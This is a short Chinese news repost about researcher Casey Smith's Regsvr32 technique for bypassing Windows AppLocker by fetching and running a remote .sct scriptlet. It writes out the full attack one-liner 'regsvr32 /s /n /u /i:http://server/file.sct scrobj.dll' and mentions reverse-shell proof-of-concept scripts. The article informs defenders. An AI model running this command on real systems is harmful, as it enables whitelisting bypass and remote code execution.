AppLocker是Windows 7和Windows Server 2008 R2中引入的一项安全功能，旨在帮助管理员们指定哪个用户或用户组能够访问/运行某一个文件。然而据外媒报道，已经有人找到了利用Windows系统中Regsvr32命令行工具的某个隐藏特性，来绕过Windows AppLocker安全措施并正常注册动态链接库(DLLs)的方法。

Regsvr32则是一款可被安装工具（或批处理脚本）使用，以便快速注册动态链接库的脚本工具。

照理说，微软既然把这款“中性”而又危险的工具留在系统中，就应该管好它不被管理员之外的人所滥用。但遗憾的是，我们几乎不可能检测到这种类型的攻击。

据安全研究人员Casey Smith所述，当攻击者在某台受感染的工作站上立足之后，就可以滥用Regsvr32、通过网络下载一个COM脚本程序（.sct文件），然后在本地机器上注册一个DLL。

更糟糕的是，攻击者甚至无需取得管理员权限。Regsvr32可借助代理和TLS连接、重定向等功能，并且它拥有微软自家的证书，所以可以执行任何看似正常的背景活动命令。

下面是标准的Regsvr32参数、以及而已命令的对比：

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith还指出，“regsvr32能够接收的脚本网址没有很好的记录，要触发这一‘旁路’，可以把内置VB和JS元素的代码块放进去”。

在进一步的测试中，研究人员还在GitHub上放出了系统管理员能够下载的“概念验证脚本”（通过Regsvr32并打开一个后门、或者基于HTTP的反向shell）。

从理论上来说，这种类型的“漏洞”允许攻击者访问注册所有DLL，然后在被感染的计算机上执行恶意代码，更别说管理员权限了。

本文转自d1net（转载）